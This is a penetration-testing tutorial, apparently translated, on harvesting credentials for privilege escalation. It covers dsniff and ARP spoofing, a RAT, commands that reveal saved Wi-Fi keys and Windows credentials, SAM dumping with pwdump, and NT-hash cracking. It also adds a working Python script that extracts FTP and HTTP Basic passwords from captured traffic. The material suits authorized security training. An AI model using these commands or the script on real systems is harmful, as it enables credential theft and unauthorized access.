Penetration Testing Privilege Escalation: Escalating via Packet Sniffing and Other Means
I. Packet Sniffing
1. Windows
• Wireshark
• OmniPeek
- Download (official site): https://www.liveaction.com/
- OmniPeek_UserGuide: https://mypeek.liveaction.com/elements/mypeek_documentation/manuals/OmniPeek_UserGuide.pdf
• CommView (mainly used on older XP-era systems)
• SniffPass (passively captures passwords from POP3, IMAP, SMTP, FTP and HTTP Basic traffic seen by the local machine)
- Download: https://www.nirsoft.net/toolsdownload/sniffpass.zip
- Setting up an FTP server on Kali as a target for the test: https://www.cnblogs.com/z9m8r8/articles/15864297.html
- Start the FTP service: service pure-ftpd start
2. Linux
• Tcpdump
• Wireshark
• Dsniff
- Does roughly what SniffPass does; install it with: apt-get install dsniff. It only decodes traffic that actually reaches the listening interface, so on a switched network you need a mirror port or ARP spoofing (arpspoof ships in the same package) to see other hosts' logins.
Example:
root@kali:~# dsniff -h
Version: 2.4
Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen]
              [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]
root@kali:~# dsniff -i eth0
dsniff: listening on eth0
-----------------
02/14/22 01:17:19 tcp 10.10.10.131.1071 -> kali.21 (ftp)
USER anonymous
PASS IEUser@

-----------------
02/14/22 01:17:25 tcp 10.10.10.131.1072 -> kali.21 (ftp)
USER anonymous
PASS IEUser@

-----------------
02/14/22 01:18:55 tcp 10.10.10.131.1074 -> kali.21 (ftp)
USER user
PASS 123456
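The dsniff session above shows the whole principle: on a cleartext protocol the credentials sit in the TCP payload, and the sniffer's job is only to reassemble each flow into lines and match the protocol's login verbs. The script below is an added example, not code from the original post or from dsniff. It does that for FTP USER/PASS and, going one step beyond the page, for HTTP Basic authentication, where the credentials are merely base64-encoded. The segment list is constructed inline to stand in for a live capture; the hosts, ports and credentials in it are made up.

```python
"""Cleartext credential extraction from captured TCP payloads, dsniff-style.

Added example: reassembles each client->server flow into CRLF-terminated lines,
then applies per-protocol decoders (FTP USER/PASS, HTTP Basic). The input is a
constructed list of segments standing in for a live capture.
"""
import base64
from collections import defaultdict

# Constructed sample capture: (timestamp, "client:port", "server:port", payload).
# Hosts, ports and credentials are made up for the example.
SAMPLE_SEGMENTS = [
    ("02/14/22 01:18:55", "10.10.10.131:1074", "10.10.10.128:21", b"USER user\r\n"),
    # A PASS line split across two TCP segments: a naive per-packet grep would miss it.
    ("02/14/22 01:18:56", "10.10.10.131:1074", "10.10.10.128:21", b"PASS 123"),
    ("02/14/22 01:18:56", "10.10.10.131:1074", "10.10.10.128:21", b"456\r\n"),
    # Two commands inside one segment.
    ("02/14/22 01:19:10", "10.10.10.131:1075", "10.10.10.128:21",
     b"USER anonymous\r\nPASS IEUser@\r\n"),
    # A PASS with no preceding USER on its flow is ignored, not misreported.
    ("02/14/22 01:19:30", "10.10.10.131:1076", "10.10.10.128:21", b"PASS orphan\r\n"),
    # HTTP Basic auth: the credentials are only base64-encoded, not encrypted.
    ("02/14/22 01:20:01", "10.10.10.131:1080", "10.10.10.128:80",
     b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
     + base64.b64encode(b"admin:P@ssw0rd") + b"\r\n\r\n"),
]


def extract_credentials(segments):
    """Return a list of {time, flow, proto, user, password} dicts in capture order."""
    buffers = defaultdict(bytes)   # per-flow bytes not yet terminated by CRLF
    pending_user = {}              # FTP flows that sent USER and await PASS
    found = []
    for ts, src, dst, payload in segments:
        flow = (src, dst)
        dport = int(dst.rsplit(":", 1)[1])
        parts = (buffers[flow] + payload).split(b"\r\n")
        lines, buffers[flow] = parts[:-1], parts[-1]   # keep the unterminated tail
        for raw in lines:
            line = raw.decode("latin-1")   # never raises, keeps odd bytes visible
            if dport == 21:
                verb, _, arg = line.partition(" ")
                if verb.upper() == "USER":
                    pending_user[flow] = arg
                elif verb.upper() == "PASS" and flow in pending_user:
                    found.append({"time": ts, "flow": f"{src} -> {dst}", "proto": "ftp",
                                  "user": pending_user.pop(flow), "password": arg})
            elif dport == 80 and line.lower().startswith("authorization: basic "):
                fields = line.split(None, 2)
                if len(fields) < 3:
                    continue
                try:
                    decoded = base64.b64decode(fields[2], validate=True)
                except ValueError:            # binascii.Error is a ValueError subclass
                    continue
                user, _, password = decoded.decode("latin-1").partition(":")
                found.append({"time": ts, "flow": f"{src} -> {dst}", "proto": "http-basic",
                              "user": user, "password": password})
    return found


def format_report(creds):
    """Render the findings in the block style dsniff prints."""
    out = []
    for c in creds:
        out.append("-----------------")
        out.append(f"{c['time']} tcp {c['flow']} ({c['proto']})")
        out.append(f"USER {c['user']}")
        out.append(f"PASS {c['password']}")
    return "\n".join(out)


if __name__ == "__main__":
    print(format_report(extract_credentials(SAMPLE_SEGMENTS)))
```

The per-flow buffer is the part that matters in practice: login lines regularly straddle segment boundaries, and a tool that grepped each packet on its own would silently drop them. Anything carried over TLS (FTPS, HTTPS) or SSH (SFTP) never reaches this decoder in the clear, which is exactly why those protocols exist.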
II. Keylogging
1. Keylogger
See: https://www.cnblogs.com/z9m8r8/articles/15864297.html
2. Credential theft with a trojan (RAT)
Example (using DarkComet-RAT-5.3.1):
e.g. its remote desktop feature:
III. Locally Cached Passwords
1. Passwords saved by browsers
• Internet Explorer
• Firefox (Edit -> Preferences -> Privacy & Security -> Saved Logins)
Example:
2. Network passwords (credentials saved in Windows Credential Manager; cmdkey /list enumerates them)
3. Wireless passwords (netsh wlan show profiles lists the saved profiles, and netsh wlan show profile name="<SSID>" key=clear reveals the stored key)
4. Password recovery tools
Tool collection: https://www.nirsoft.net/password_recovery_tools.html
5. Dumping the SAM
• Pwdump (can be run against a remote host: pass the target machine name or IP together with an account that has administrative rights via -u/-p; it reaches the SAM through an SMB share on the target)
• fgdump, shipped with Kali under /usr/share/windows-binaries/fgdump/
help:
C:\>PwDump.exe -h
pwdump6 Version 2.0.0-beta-2 by fizzgig and the mighty group at foofus.net
** THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. **
Copyright 2009 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Usage: PwDump.exe [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName
  where -h prints this usage message and exits
  where -o specifies a file to which to write the output
  where -u specifies the user name used to connect to the target
  where -p specifies the password used to connect to the target
  where -s specifies the share to be used on the target, rather than searching for one
  where -n skips password histories
  where -x targets a 64-bit host
Example:
On Windows, account passwords are not stored encrypted but as two unsalted hashes: the LM hash (e.g. 44EF……4EE) and the NTLM hash (e.g. 32ED……8D4). LM hashing has been disabled by default since Windows Vista / Server 2008, so on modern hosts the LM column usually holds the fixed "empty" value aad3b435b51404eeaad3b435b51404ee and only the NT hash is worth attacking. For background on LM, NTLM and Net-NTLMv2 and on cracking these hashes, see: https://www.cnblogs.com/junsec/p/11810703.html
Copy the username and hash lines into a separate .pwdump file and crack them with the tools in Kali. Note that this is offline cracking (a dictionary or brute-force attack against the hash), not decryption: for example john --format=NT hashes.pwdump, or hashcat -m 1000 on the NT hash column.
Stay true to your original aspiration, and you will see it through.